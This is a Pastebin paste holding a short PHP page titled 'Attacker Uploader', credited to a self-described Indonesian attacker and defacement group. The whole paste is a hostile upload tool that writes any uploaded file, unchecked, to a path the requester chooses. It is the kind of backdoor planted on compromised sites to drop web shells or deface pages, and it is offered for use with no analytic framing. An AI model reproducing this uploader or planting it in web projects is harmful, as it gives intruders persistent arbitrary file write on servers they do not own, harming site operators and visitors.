Cracker86

Uploader

Mar 27th, 2019
170
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.41 KB | None | 0 0
  1. <!doctype html>
  2. <html>
  3. <title>Attacker Uploader</title><link rel="icon" type="image/png" href="https://a.top4top.net/p_1177ni3n80.jpg"/><meta http-equiv="Content-Type" content="text/html; charset=Windows-1254" /><link href='https://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'><link href='https://fonts.googleapis.com/css?family=Shadows+Into+Light' rel='stylesheet' type='text/css'> <meta property="og:image" content="https://a.top4top.net/p_1177ni3n80.jpg">
  4.    
  5.    <meta charset="utf-8">
  6.    <meta content="5H311_1NJ3C706" name="description"/>
  7.    <meta content="5H311_1NJ3C706" name="keyword"/>
  8. <script type="text/javascript">
  9. </script>
  10. <br><br><br>
  11.  
  12. <body>
  13.   <center>
  14. <?php
  15. }?>
  16.  
  17. <br><br><br>
  18.  
  19. <hr>
  20.  
  21. <br><br>
  22. <h2><font color='red' face = 'iceland' > Uploader</h2> </font>
  23. <?php
  24.  $files = @$_FILES["files"];
  25.  if ($files["name"] != '') {
  26.  $fullpath = $_REQUEST["path"] . $files["name"];
  27.  if (move_uploaded_file($files['tmp_name'],
  28.  $fullpath)) {
  29.  echo "<a href='$fullpath' target='_blank'>Akses
  30. untuk $fullpath</a>";
  31.  }
  32.  }echo '<form method=POST
  33. enctype="multipart/form-data" action=""><input
  34. type="file" name="files"><input type=submit
  35. value="Fire!"></form></body></html>';?>
  36.  <br><br><br>
  37.   <font color = 'white'>Cracker By 5H311_1NJ3C706<br><br>BLACK PHANTOM CYBER. <br><br><br><font color = 'red'>Indonesian Attacker Cyber</font>
  38.  </center>
  39.  </div>
  40. </body>
  41. </html>
Advertisement
Add Comment
Please, Sign In to add comment